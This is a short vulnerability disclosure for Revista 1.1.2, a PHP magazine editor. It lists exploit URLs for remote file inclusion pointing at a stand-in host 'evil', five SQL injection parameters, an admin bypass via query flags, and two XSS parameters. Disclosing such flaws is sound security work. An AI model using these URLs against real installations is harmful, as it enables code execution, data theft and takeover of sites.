Revista version 1.1.2 suffers from remote file inclusion, SQL injection, administrative bypass, and cross site scripting flaws.
9e65a953957bef6efa3fcaa4ad816983f1a070563239302100796a1c8dbc8768
Discovered by Sirdarckcat from elhacker.net
------------------------------------------------------------------------------------
Revista 1.1.2
https://php-revista.sourceforge.org
------------------------------------------------------------------------------------
Revista is a simple spanish PHP magazine editor.
It was done by php.org.mx
It suffers of multiple vulnerabilities.
------------------------------------------------------------------------------------
Remote File Inclusion
https://revista/estilo/[ANY STYLE]/index.php?adodb=https://evil/script
------------------------------------------------------------------------------------
SQLi
https://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
https://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
https://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
https://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
https://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
------------------------------------------------------------------------------------
Credentials Bypass
https://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1
------------------------------------------------------------------------------------
XSS
https://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>
https://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>
------------------------------------------------------------------------------------
Att.
Sirdarckcat
elhacker.net